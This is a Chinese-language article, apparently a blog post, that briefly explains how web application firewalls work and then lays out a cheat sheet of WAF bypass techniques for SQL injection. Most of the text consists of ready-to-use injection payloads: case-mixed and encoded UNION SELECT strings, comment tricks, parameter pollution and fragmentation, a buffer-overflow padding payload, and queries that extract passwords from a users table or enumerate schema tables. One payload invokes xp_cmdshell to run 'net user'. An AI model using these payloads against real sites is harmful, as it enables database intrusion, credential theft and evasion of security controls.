Web應用程式防火牆WAF是如何工作的?
1. 協議異常檢測:拒絕不符合HTTP標準的請求2. 增強的輸入驗證:代理和伺服器端驗證,而不僅僅是客戶端驗證3. 白名單和黑名單4. 基於規則和基於異常的保護:基於規則的更依賴黑名單機制,基於異常則更靈活5. 狀態管理:關注會話保護還有:Cookie保護,反入侵規避技術,響應監控和資訊披露保護。
如何繞過WAF?
1. 當我們在目標URL進行SQL注入測試時,可以透過修改注入語句中字母的大小寫來觸發WAF保護情況。如果WAF使用區分大小寫的黑名單,則更改大小寫可能會幫我們成功繞過WAF的過濾。
http://www.xxxxx.com/index.php?page_id=-15 uNIoN sELecT 1,2,3,42. 關鍵字替換(在關鍵字中間可插入將會被WAF過濾的字元) – 例如SELECT可插入變成SEL
http://www.xxxxx.com/index.php?page_id=-15 UNIunionON SELselectECT 1,2,3,43. 編碼
+ URL encode page.php?id=1%252f%252a*/UNION%252f%252a /SELECT +Hex encode www.xxxxx.com/index.php?page_id=-15 /*!u%6eion*/ /*!se%6cect*/ 1,2,3,4… SELECT(extractvalue(0x3C613E61646D696E3C2F613E,0x2f61)) +Unicode encode ?id=10%D6‘%20AND%2201=2%23 SELECT '?'='A'; #14. 使用註釋
在攻擊字串中插入註釋。例如,/*!SELECT*/ 這樣WAF可能就會忽略該字串,但它仍會被傳遞給目標應用程式並交由mysql資料庫處理。
index.php?page_id=-15 %55nION/**/%53ElecT 1,2,3,4 'union%a0select pass from users# index.php?page_id=-15 /*!UNION*/ /*!SELECT*/ 1,2,3 ?page_id=null%0A/**//*!50000%55nIOn*//*yoyu*/all/**/%0A/*!%53eLEct*/%0A/*nnaa*/+1,2,3,4…5. 某些函式或命令,因為WAF的過濾機制導致我們無法使用。那麼,我們也可以嘗試用一些等價函式來替代它們。
hex()、bin() ==> ascii() sleep() ==>benchmark() concat_ws()==>group_concat() substr((select 'password'),1,1) = 0x70 strcmp(left('password',1), 0x69) = 1 strcmp(left('password',1), 0x70) = 0 strcmp(left('password',1), 0x71) = -1 mid()、substr() ==> substring() @@user ==> user() @@datadir ==> datadir()6. 使用特殊符號
這裡我把非字母數字的字元都規在了特殊符號一類,特殊符號有特殊的含義和用法。
+ ` symbol: select `version()`; + +- :select+id-1+1.from users; + @:select@^1.from users; +Mysql function() as xxx +`、~、!、@、%、()、[]、.、-、+ 、|、%00 示例 ‘se’+’lec’+’t’ %S%E%L%E%C%T 1 1.aspx?id=1;EXEC(‘ma’+'ster..x’+'p_cm’+'dsh’+'ell ”net user”’) ' or --+2=- -!!!'2 id=1+(UnI)(oN)+(SeL)(EcT)7. HTTP引數控制 透過提供多個引數=相同名稱的值集來混淆WAF。例如 http://www.xxxxx.com?id=1&?id=’ or ‘1’=’1′ — ‘在某些情況下(例如使用Apache/PHP),應用程式將僅解析最後(第二個) id= 而WAF只解析第一個。在應用程式看來這似乎是一個合法的請求,因此應用程式會接收並處理這些惡意輸入。如今,大多數的WAF都不會受到HTTP引數汙染(HPP)的影響,但仍然值得一試。
+ HPP(HTTP Parameter Polution))
/?id=1;select+1,2,3+from+users+where+id=1— /?id=1;select+1&id=2,3+from+users+where+id=1— /?id=1/**/union/*&id=*/select/*&id=*/pwd/*&id=*/from/*&id=*/usersHPP又稱做重複引數汙染,最簡單的就是?uid=1&uid=2&uid=3,對於這種情況,不同的Web伺服器處理方式如下:
+HPF (HTTP Parameter Fragment)
這種方法是HTTP分割注入,同CRLF有相似之處(使用控制字元%0a、%0d等執行換行)
/?a=1+union/*&b=*/select+1,pass/*&c=*/from+users-- select * from table where a=1 union/* and b=*/select 1,pass/* limit */from users—+HPC (HTTP Parameter Contamination)RFC2396定義了以下字元:Unreserved: a-z, A-Z, 0-9 and _ . ! ~ * ' () Reserved : ; / ? : @ & = + $ , Unwise : { } | \ ^ [ ] ` 不同的Web伺服器處理處理構造得特殊請求時有不同的邏輯:以魔術字元%為例,Asp/Asp.net會受到影響。
8. 緩衝區溢位
WAF和其他所有的應用程式一樣也存在著各種缺陷和漏洞。如果出現緩衝區溢位的情況,那麼WAF可能就會崩潰,即使不能程式碼執行那也會使WAF無法正常執行。這樣,WAF的安全防護自然也就被瓦解了。
?id=1 and (select 1)=(Select 0xA*1000)+UnIoN+SeLeCT+1,2,version(),4,5,database(),user(),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,269. 整合繞過
當使用單一的方式無法繞過時,我們則可以靈活的將多種方式結合在一起嘗試。
www.xxxxx.com/index.php?page_id=-15+and+(select 1)=(Select 0xAA[..(add about 1000 "A")..])+/*!uNIOn*/+/*!SeLECt*/+1,2,3,4… id=1/*!UnIoN*/+SeLeCT+1,2,concat(/*!table_name*/)+FrOM /*information_schema*/.tables /*!WHERE */+/*!TaBlE_ScHeMa*/+like+database()– - ?id=-725+/*!UNION*/+/*!SELECT*/+1,GrOUp_COnCaT(COLUMN_NAME),3,4,5+FROM+/*!INFORMATION_SCHEM*/.COLUMNS+WHERE+TABLE_NAME=0x41646d696e--